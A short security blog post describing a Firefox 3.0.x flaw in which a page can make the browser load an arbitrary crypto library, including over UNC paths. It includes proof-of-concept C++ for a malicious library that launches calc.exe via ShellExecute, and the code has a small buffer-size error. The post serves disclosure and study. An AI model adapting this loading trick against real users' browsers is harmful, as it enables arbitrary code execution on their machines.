This is a handy way to execute code within the browser. Kudos to Jesse Ruderman and Dan Kaminsky for the bug discovery and POC.
Essentially, in Firefox up through 3.0.13 (my ubuntu 9.04 is running 3.0.11), there’s a publicly exposed javascript function which allows you to call an arbitrary crypto library on the system. Assuming you’re able to place a malicious library (see below) in the target environment, you could use this to get other systems to execute it. Extra win, you can use UNC paths to locate the library 🙂
Source is here. <– note, this is live, but it’s calling a non-existent crypto library.
The malicious library would need a function named CPkunkcsApp(), which, in this case, just calls ShellExecute.
<font face="monospace">CpkunkcsApp::CpkunkcsApp()
{
char *str = "c:\\windows\\system32\\calc.exe";
wchar_t *wText;
size_t len;
len = strlen(str)+1;
wText = new wchar_t[strlen(str)];
memset(wText, 0, len * sizeof(wchar_t));
::MultiByteToWideChar(CP_ACP, NULL, str, -1, wText, len);
ShellExecute(NULL, NULL, wText, NULL, NULL, SW_SHOW);
}</font>
Jonathan Cran 